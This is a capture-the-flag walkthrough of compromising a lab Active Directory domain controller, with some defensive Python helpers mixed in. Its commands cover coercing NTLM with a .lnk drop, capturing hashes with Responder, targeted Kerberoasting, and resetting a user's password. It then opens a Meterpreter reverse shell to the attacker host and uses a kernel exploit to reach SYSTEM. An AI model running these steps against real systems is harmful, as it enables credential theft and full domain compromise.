This Active Directory machine starts off with ZERO CREDENTIALS. Our initial scan shows the normal ports open for a Windows server. We first check SMB and find that Guest authentication gives us access to a ‘Share’ directory, with READ,WRITE on it. After uploading a .lnk file there, we capture the NTLMv2 hash of bob.ross. Once a BloodHound dump is obtained, we find we have GenericAll over the user alice.wonderland. We can abuse this a couple of ways, which entail either setting an SPN and targeted Kerberoasting or changing her password. alice.wonderland has access to the box because she is in Remote Management Users. After poking around some, we find a SQL directory at C:\ but have no access to it. Nevertheless, this is an older Windows machine (Server 2022). Using CVE-2024-35250 to exploit at the kernel level, we are able to obtain SYSTEM with msfconsole.

Initial Scan

PORT     STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 126 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2025-11-23 21:01:32Z)
135/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: hack.smarter0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 126
464/tcp open kpasswd5? syn-ack ttl 126
593/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 126
3268/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: hack.smarter0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 126
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.hack.smarter
| Issuer: commonName=DC01.hack.smarter
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-05T03:46:00
| Not valid after: 2026-03-07T03:46:00
| MD5: 4b40:6c01:63f1:81e4:4f56:64b7:8ef3:4bbc
| SHA-1: 2ad1:c7dc:ab46:ae72:570a:ea85:2192:51cf:1707:3692
| -----BEGIN CERTIFICATE-----
| MIIC5jCCAc6gAwIBAgIQL7/TDfsBKaJEuIxvqLtNeDANBgkqhkiG9w0BAQsFADAc
| MRowGAYDVQQDExFEQzAxLmhhY2suc21hcnRlcjAeFw0yNTA5MDUwMzQ2MDBaFw0y
| NjAzMDcwMzQ2MDBaMBwxGjAYBgNVBAMTEURDMDEuaGFjay5zbWFydGVyMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr/z97jkoYVuqCfcPuR2gCVRNgSK+
| MB7v2Nxa64USo34Z8OzT758ox5d7FFrmZSm3A0bvUNtVYjw4qAekjAYNCSCZO1JI
| GVDjieej7jRyApmXOCnV82Pp0pDZuc/v8hg1X1JNeXlI4vgi4cVXIQk2Cg6ljjap
| DRcm2JARZ8gNFvn/VbDTBpipp2nFIENtCM0wwslxI4SGbx8+GisHqOwt0tbelpuL
| JQ+uQPoddL45Fz7uQ/Pp/5nnqmtR/6yAR2jFir3v5/hZ7zycPCTlAocRth6azFW2
| UTke69SByvN+BJdgP2QbyXWcJHwX0GatenQCzht4ZCq0O2CsX9+7+lPKbQIDAQAB
| oyQwIjATBgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcN
| AQELBQADggEBAAVQZIet+fvKcDwhSGcITFyO7RHjL51Q0aauioSdlow50XVGZ8vW
| ptOhb5GwWmGfo8abmKZO8mqK/SkaNU6pA7zwvBHVUqwWF2bMKyWKMBLOB0VIQaxT
| ZfV0LL8KR3oCs1fuC60rxDF8JIEne9vgL5z+dmgxXd6SZJf1//ZPjmUf7ai3ohtg
| MRq87WZuf2P7m2rZaPcIcyMDM0Zt5MSGr+bD9V2AboDrKh6TYrz4ODkNPUbeGyT/
| q57XlN2ERF6OYCYAGpLdCDxHmAhQhihKbxtnC4vwhUCaXnDUSD2v+9WYbrFmWMNl
| UCJT2ircDq6fnW4O9KJJhg5udslgzhQcT3Y=
|_-----END CERTIFICATE-----
|_ssl-date: 2025-11-23T21:01:42+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: HACK
| NetBIOS_Domain_Name: HACK
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: hack.smarter
| DNS_Computer_Name: DC01.hack.smarter
| DNS_Tree_Name: hack.smarter
| Product_Version: 10.0.20348
|_ System_Time: 2025-11-23T21:01:34+00:00
5985/tcp open http syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 20320/tcp): CLEAN (Couldn't connect)
| Check 2 (port 13605/tcp): CLEAN (Couldn't connect)
| Check 3 (port 7253/udp): CLEAN (Timeout)
| Check 4 (port 64780/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-11-23T21:01:39
|_ start_date: N/A

Adding the hostnames to our hosts file.
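The names nmap's rdp-ntlm-info script printed (DNS_Computer_Name, NetBIOS_Computer_Name, DNS_Domain_Name) are the ones worth putting in the hosts file; the LDAP service line's "Domain: hack.smarter0." carries nmap's usual trailing junk and is less reliable. The following is an added example, not part of the original writeup: it pulls those fields out of a constructed excerpt of the scan above and builds the hosts line. The IP and excerpt are taken from the page; the function names are my own.

```python
import re

# Constructed excerpt of the nmap output above (only the lines this parser needs).
SAMPLE_NMAP = """\
389/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: hack.smarter0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HACK
| NetBIOS_Domain_Name: HACK
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: hack.smarter
| DNS_Computer_Name: DC01.hack.smarter
| DNS_Tree_Name: hack.smarter
| Product_Version: 10.0.20348
|_ System_Time: 2025-11-23T21:01:34+00:00
"""

# Name fields from the rdp-ntlm-info NSE script output that we keep.
NAME_FIELDS = ("NetBIOS_Domain_Name", "NetBIOS_Computer_Name",
               "DNS_Domain_Name", "DNS_Computer_Name", "DNS_Tree_Name")
# "| Key: value" or "|_ Key: value" lines; keys with hyphens (script names) do not match.
FIELD_RE = re.compile(r"^\|_?\s*([A-Za-z_]+):\s*(\S.*?)\s*$")


def parse_ntlm_info(scan_text):
    """Collect the name fields the NSE script printed, as a dict."""
    info = {}
    for line in scan_text.splitlines():
        m = FIELD_RE.match(line)
        if m and m.group(1) in NAME_FIELDS:
            info[m.group(1)] = m.group(2)
    return info


def hosts_entry(ip, info):
    """Build one /etc/hosts line: FQDN, short hostname, then the domain (lower-cased, deduplicated)."""
    names = []
    for key in ("DNS_Computer_Name", "NetBIOS_Computer_Name", "DNS_Domain_Name"):
        value = info.get(key, "").lower()
        if value and value not in names:
            names.append(value)
    if not names:
        raise ValueError("no hostnames found in scan output")
    return f"{ip} {' '.join(names)}"


if __name__ == "__main__":
    print(hosts_entry("10.0.21.159", parse_ntlm_info(SAMPLE_NMAP)))
```

Run it as-is and append the printed line to /etc/hosts; the domain name is included because Kerberos tools expect the realm to resolve as well.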

SMB

We can check the usual null auth and Guest logins to see if we have access.

konoha# nxc smb hack.smarter -u Guest -p '' --shares
SMB 10.0.21.159 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.smarter) (signing:True) (SMBv1:False)
SMB 10.0.21.159 445 DC01 [+] hack.smarter\Guest:
SMB 10.0.21.159 445 DC01 [*] Enumerated shares
SMB 10.0.21.159 445 DC01 Share Permissions Remark
SMB 10.0.21.159 445 DC01 ----- ----------- ------
SMB 10.0.21.159 445 DC01 ADMIN$ Remote Admin
SMB 10.0.21.159 445 DC01 C$ Default share
SMB 10.0.21.159 445 DC01 IPC$ READ Remote IPC
SMB 10.0.21.159 445 DC01 NETLOGON Logon server share
SMB 10.0.21.159 445 DC01 Share READ,WRITE
SMB 10.0.21.159 445 DC01 SYSVOL Logon server share

In this case we do, and we have READ,WRITE on Share, so we can upload a little .lnk file using the slinky module from NetExec.
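A share that Guest can write to is exactly what makes the .lnk drop below possible, so it is the first thing to look for in share enumeration output. This added example (mine, not from the writeup or from NetExec) parses output shaped like the nxc listing above and reports the shares the enumerating account can write to. The sample text is constructed from the page's own listing; the functions are hypothetical helper names.

```python
import re

# Constructed sample in the shape of the `nxc smb ... --shares` output above.
SAMPLE_NXC = """\
SMB 10.0.21.159 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.smarter) (signing:True) (SMBv1:False)
SMB 10.0.21.159 445 DC01 [+] hack.smarter\\Guest:
SMB 10.0.21.159 445 DC01 [*] Enumerated shares
SMB 10.0.21.159 445 DC01 Share Permissions Remark
SMB 10.0.21.159 445 DC01 ----- ----------- ------
SMB 10.0.21.159 445 DC01 ADMIN$ Remote Admin
SMB 10.0.21.159 445 DC01 C$ Default share
SMB 10.0.21.159 445 DC01 IPC$ READ Remote IPC
SMB 10.0.21.159 445 DC01 NETLOGON Logon server share
SMB 10.0.21.159 445 DC01 Share READ,WRITE
SMB 10.0.21.159 445 DC01 SYSVOL Logon server share
"""

# "SMB <ip> <port> <host> <share> [rest]"; column alignment is not relied on,
# because copy/paste usually collapses it.
ROW_RE = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+(\S+)(?:\s+(.*))?$")
PERM_RE = re.compile(r"^(?:READ|WRITE|READ,WRITE)$")


def parse_shares(output):
    """Map share name -> {'perms': set, 'remark': str} from nxc --shares output."""
    shares = {}
    in_table = False
    for line in output.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        name, rest = m.group(1), (m.group(2) or "").strip()
        if name.startswith("["):             # [*]/[+] status lines, not table rows
            continue
        if name == "Share" and rest.startswith("Permissions"):
            in_table = True                  # table header reached
            continue
        if not in_table or name.startswith("-----"):
            continue
        perms, remark = set(), rest
        head = rest.split(None, 1)
        if head and PERM_RE.match(head[0]):  # permissions column present
            perms = set(head[0].split(","))
            remark = head[1] if len(head) > 1 else ""
        shares[name] = {"perms": perms, "remark": remark}
    return shares


def guest_writable(shares):
    """Shares the enumerating account (here Guest) can write to: the ones to lock down first."""
    return sorted(name for name, s in shares.items() if "WRITE" in s["perms"])


if __name__ == "__main__":
    shares = parse_shares(SAMPLE_NXC)
    print("writable by the enumerating account:", guest_writable(shares))
```

The parser treats the first token after the share name as the permissions column only when it is exactly READ, WRITE or READ,WRITE, which is how ADMIN$'s "Remote Admin" remark is kept from being misread as a permission.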

konoha# nxc smb hack.smarter -u Guest -p '' -M slinky -o SERVER=10.200.21.53 NAME=EVILMElol
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
SMB 10.0.21.159 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.smarter) (signing:True) (SMBv1:False)
SMB 10.0.21.159 445 DC01 [+] hack.smarter\Guest:
SMB 10.0.21.159 445 DC01 [*] Enumerated shares
SMB 10.0.21.159 445 DC01 Share Permissions Remark
SMB 10.0.21.159 445 DC01 ----- ----------- ------
SMB 10.0.21.159 445 DC01 ADMIN$ Remote Admin
SMB 10.0.21.159 445 DC01 C$ Default share
SMB 10.0.21.159 445 DC01 IPC$ READ Remote IPC
SMB 10.0.21.159 445 DC01 NETLOGON Logon server share
SMB 10.0.21.159 445 DC01 Share READ,WRITE
SMB 10.0.21.159 445 DC01 SYSVOL Logon server share
SLINKY 10.0.21.159 445 DC01 [+] Found writable share: Share
SLINKY 10.0.21.159 445 DC01 [+] Created LNK file on the Share share

Setting up Responder, we capture an NTLMv2 hash for bob.ross.

konoha# responder -I tun0 -w
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
<SNIP>
[+] Listening for events...

[SMB] NTLMv2-SSP Client : 10.0.21.159
[SMB] NTLMv2-SSP Username : HACK\bob.ross
[SMB] NTLMv2-SSP Hash : bob.ross::HACK:de13d20268eb75c7:<SNIP>:<SNIP>

Sidequest to crack the code

I’ve been using john a lot lately. I know hashcat is far superior, but it works better on a VM than hashcat does.

konoha# john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt bob.ross.hash
bob.ross <SNIP>

New Found LAND!!!

With our newly acquired credentials, we can get a BloodHound dump and look at what we have. I’m using bloodyAD to get my dump.

konoha# bloodyAD -v DEBUG -d hack.smarther -u bob.ross -p '<SNIP>' -H dc01.hack.smarter get bloodhound
[*] Connection URL: ldap+ntlm-pw://hack.smarther\bob.ross:<SNIP>@dc01.hack.smarter/?serverip=10.0.21.159
[*] Trying to connect to dc01.hack.smarter...
[*] Connection successful
[+] Connecting to LDAP server
[+] Connected to LDAP serrver
Dumping schema: 2it [00:00, 17.50it/s]
Generating lookuptable: 79it [00:00, 250.85it/s]
Dumping SDs: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 83/83 [00:02<00:00, 32.79it/s]
Dumping domains: 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 10.87it/s]
Dumping users: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 6/6 [00:00<00:00, 173.06it/s]
Dumping computers: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 32.17it/s]
Dumping groups: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 49/49 [00:00<00:00, 995.52it/s]
Dumping GPOs: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 68.76it/s]
Dumping OUs: 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 33.37it/s]
Dumping Containers: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 19/19 [00:00<00:00, 363.72it/s]
[+] Bloodhound data saved to 20251123T234611_Bloodhound.zip
[+] Found 0 trust

Once uploaded to BloodHound we can check paths. This shows us we have GenericAll over alice.wonderland.

We can do many things here, but I simply changed her password. I genuinely don’t like to start off by changing the password, especially on a red-team engagement. (I’ll show targeted Kerberoasting as well.)
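The same GenericAll edge BloodHound draws here is what a defender should be hunting for in the collected data before anyone else does. This added example (my code, not the writeup's and not BloodHound's) reads a constructed file shaped like a BloodHound users collection and lists every principal, other than Domain Admins and Enterprise Admins, that holds a takeover right (GenericAll, GenericWrite, WriteDacl, WriteOwner, ForceChangePassword) over a user object; any of those rights allows the password reset or the SPN write shown in this writeup. The SIDs and the reduced JSON layout are assumptions; real exports carry many more properties.

```python
import json

# Constructed sample shaped like a BloodHound "users" collection file (assumption: real
# exports carry many more properties and ACEs; only the keys this audit reads are included).
SAMPLE_USERS_JSON = json.dumps({
    "data": [
        {
            "ObjectIdentifier": "S-1-5-21-1111-2222-3333-1105",
            "Properties": {"name": "ALICE.WONDERLAND@HACK.SMARTER"},
            "Aces": [
                {"PrincipalSID": "S-1-5-21-1111-2222-3333-512",
                 "PrincipalType": "Group", "RightName": "GenericAll", "IsInherited": False},
                {"PrincipalSID": "S-1-5-21-1111-2222-3333-1104",
                 "PrincipalType": "User", "RightName": "GenericAll", "IsInherited": False},
            ],
        },
        {
            "ObjectIdentifier": "S-1-5-21-1111-2222-3333-1104",
            "Properties": {"name": "BOB.ROSS@HACK.SMARTER"},
            "Aces": [
                {"PrincipalSID": "S-1-5-21-1111-2222-3333-512",
                 "PrincipalType": "Group", "RightName": "GenericAll", "IsInherited": False},
            ],
        },
    ],
    "meta": {"type": "users", "count": 2, "version": 5},
})

# Rights on a user object that hand over the account: password reset and SPN write
# (the two abuses shown in this writeup) both follow from any of these.
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "ForceChangePassword"}
# Well-known RIDs whose control over every user is expected:
# 512 = Domain Admins, 519 = Enterprise Admins.
EXPECTED_RIDS = {"512", "519"}


def find_user_takeover_edges(users_json):
    """Return (holder, right, target) triples for non-admin principals controlling a user."""
    data = json.loads(users_json)["data"]
    sid_to_name = {u["ObjectIdentifier"]: u["Properties"]["name"] for u in data}
    findings = []
    for user in data:
        for ace in user.get("Aces", []):
            if ace["RightName"] not in TAKEOVER_RIGHTS:
                continue
            if ace["PrincipalSID"].rsplit("-", 1)[-1] in EXPECTED_RIDS:
                continue
            holder = sid_to_name.get(ace["PrincipalSID"], ace["PrincipalSID"])
            findings.append((holder, ace["RightName"], user["Properties"]["name"]))
    return findings


if __name__ == "__main__":
    for holder, right, target in find_user_takeover_edges(SAMPLE_USERS_JSON):
        print(f"{holder} has {right} over {target}")
```

Principals whose SID is not in the users file (groups, computers) are reported by SID; extending the lookup table with the groups and computers collections resolves them the same way.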

bloodyAD -v DEBUG -d hack.smarther -u bob.ross -p '<SNIP>' -H dc01.hack.smarter set password alice.wonderland P@ssw0rd
[*] Connection URL: ldap+ntlm-pw://hack.smarther\bob.ross:<SNIP>@dc01.hack.smarter/?serverip=10.0.21.159
[*] Trying to connect to dc01.hack.smarter...
[*] Connection successful
[+] Password changed successfully!

TargetedKerberoasting

First we set an SPN for the user.

konoha# bloodyAD -v DEBUG -d hack.smarther -u bob.ross -p '137Password123!@#' -H dc01.hack.smarter msldap addspn 'CN=alice.wonderland,CN=Users,DC=hack,DC=smarter' cifs/bic
[*] Connection URL: ldap+ntlm-pw://hack.smarther\bob.ross:137Password123%21%40%23@dc01.hack.smarter/?serverip=10.0.21.159
[*] Trying to connect to dc01.hack.smarter...
[*] Connection successful
SPN added!

Then we can simply targeted-Kerberoast this user.

konoha# python3 /opt/tools/targetedKerberoast/targetedKerberoast.py -u bob.ross -p '<SNIP>' --dc-ip 10.0.21.159 -d hack.smarter --request-user alice.wonderland
[*] Starting kerberoast attacks
[*] Attacking user (alice.wonderland)
[+] Printing hash for (alice.wonderland)
$krb5tgs$23$*alice.wonderland$HACK.SMARTER$hack.smarter/alice.wonderland*$c0877f710c4a3c59743ba96bd14a75e5$9e865d389a305516264f13644ba1e68dbb216e08e4cf70c31c0320aa53cd4bf2eef18b1c19ddfa3c71583eadb970a35eccdaec0a82c9537d45074af121cd13a1810824b0ff0be45dd8773176420b0055943ded1e96c1e7e4a716a9adfb9b8cb0aed78f8350a0fa2c162c3ca3b6ef6f59ed0236ad215b698bcf55bc84996d9893c7b4d533629ff3d42ea682a63864f9f677a6b4c021bdbe61895bb0296066401bf0b01a354d2b0e1f5b06ec64659c8425c1edd67ef4b1f764eca1af2fec2401002d46f0ef9580d36707f343fa9e3<SNIP>

We can try to crack it if the password is weak; if it doesn’t crack, we could then resort to changing the password.
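Both captures in this writeup, the NTLMv2 response Responder logged for bob.ross and the TGS hash targetedKerberoast printed for alice.wonderland, are structured lines whose fields tell you what was exposed. This added example (mine, not from the page or either tool) parses both formats and records what each one means for the account: the NTLMv2 line exposes a challenge/response that only the password strength protects, and the $krb5tgs$23$ prefix means an RC4 ticket keyed directly from the NT hash, which is why user accounts with SPNs should be AES-only or moved to a gMSA. The hex bodies in the samples are constructed and shortened; the layouts follow the page's own captures.

```python
import re

# Constructed samples in the shape of the two captures above; the hex bodies are made up
# and shortened, and carry no real key material.
SAMPLE_NTLMV2 = ("bob.ross::HACK:de13d20268eb75c7:"
                 "0123456789abcdef0123456789abcdef:0101000000000000aabbccdd")
SAMPLE_KRB5TGS = ("$krb5tgs$23$*alice.wonderland$HACK.SMARTER$hack.smarter/alice.wonderland*"
                  "$c0877f710c4a3c59743ba96bd14a75e5$9e865d389a305516264f13644ba1e68d")

# NetNTLMv2 as Responder/john write it: user::domain:server-challenge:NTProofStr:blob
NTLMV2_RE = re.compile(
    r"^(?P<user>[^:]+)::(?P<domain>[^:]+):(?P<challenge>[0-9a-fA-F]{16}):"
    r"(?P<ntproof>[0-9a-fA-F]{32}):(?P<blob>[0-9a-fA-F]+)$")
# Kerberoast TGS line: $krb5tgs$<etype>$*user$REALM$spn*$checksum$encrypted-data
KRB5TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$")

ETYPE_NAMES = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}


def classify_hash(line):
    """Identify a captured hash line and what its presence means for the account."""
    m = NTLMV2_RE.match(line.strip())
    if m:
        return {
            "kind": "netntlmv2", "user": m["user"], "domain": m["domain"],
            "server_challenge": m["challenge"], "ntproof": m["ntproof"],
            "note": "offline-crackable challenge/response; only the password strength protects it",
        }
    m = KRB5TGS_RE.match(line.strip())
    if m:
        etype = int(m["etype"])
        return {
            "kind": "krb5tgs", "user": m["user"], "realm": m["realm"], "spn": m["spn"],
            "etype": etype, "etype_name": ETYPE_NAMES.get(etype, "unknown"),
            "note": ("RC4 ticket keyed straight from the NT hash: fast to crack; "
                     "this user account has an SPN and should be AES-only or a gMSA"
                     if etype == 23 else
                     "AES ticket: PBKDF2-derived key slows cracking, but a weak password still falls"),
        }
    return None


if __name__ == "__main__":
    for sample in (SAMPLE_NTLMV2, SAMPLE_KRB5TGS):
        print(classify_hash(sample))
```

Feeding this the real capture files from Responder or targetedKerberoast gives a per-account inventory of what leaked, which is the list to drive password resets and SPN clean-up from after an engagement.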

Getting a foot in the door

So starting off not too strong. No privileges for us to use.

konoha# evil-winrm -i dc01.hack.smarter -u alice.wonderland -p 'P@ssw0rd'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
/var/lib/gems/3.3.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Checking the OS, we have Windows Server 2022 Standard.

*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> Get-ComputerInfo


WindowsBuildLabEx : 20348.1.amd64fre.fe_release.210507-1500
WindowsCurrentVersion : 6.3
WindowsEditionId : ServerStandard
WindowsInstallationType : Server
WindowsInstallDateFromRegistry : 9/2/2025 9:09:11 PM
WindowsProductId : 00454-10000-00001-AA349
WindowsProductName : Windows Server 2022 Standard

For PrivEsc we can use Metasploit, since it’s well equipped with an armory.

PrivEsc

So we can create a shell with msfvenom and continue from there.

konoha# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=32002 -f exe > pga.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7680 bytes

Then we set up our listener in msfconsole.

msf exploit(windows/local/cve_2024_35250_ks_driver) > use exploit/multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) >
msf exploit(multi/handler) > options

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 32002 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target



View the full module info with the info, or info -d command.

msf exploit(multi/handler) > run -j
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.200.21.53:32002

Finally, we can upload and execute.

*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> upload pga.exe
*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> start pga.exe

And back on our machine.

msf exploit(multi/handler) >
[*] Sending stage (230982 bytes) to 10.0.21.159
[*] Meterpreter session 5 opened (10.200.21.53:32002 -> 10.0.21.159:54023) at 2025-11-23 18:57:41 -0600

msf exploit(multi/handler) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getuid
Server username: HACK\alice.wonderland

I bet you already knew about this 😏

Looking for juicy vulnerabilities.

meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.0.21.159 - Collecting local exploits for x64/windows...
[*] Collecting exploit 751 / 2568

After this gave back its output, we find that there are many we can try. This kernel exploit worked perfectly.

msf exploit(windows/local/cve_2024_35250_ks_driver) > run
[*] Started reverse TCP handler on 10.200.21.53:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
[*] Launching notepad to host the exploit...
[*] The notepad path is: C:\Windows\System32\notepad.exe
[*] The notepad pid is: 6704
[*] Reflectively injecting the DLL into 6704...
[*] Sending stage (230982 bytes) to 10.0.21.159
[*] Meterpreter session 4 opened (10.200.21.53:4444 -> 10.0.21.159:51034) at 2025-11-23 16:09:08 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM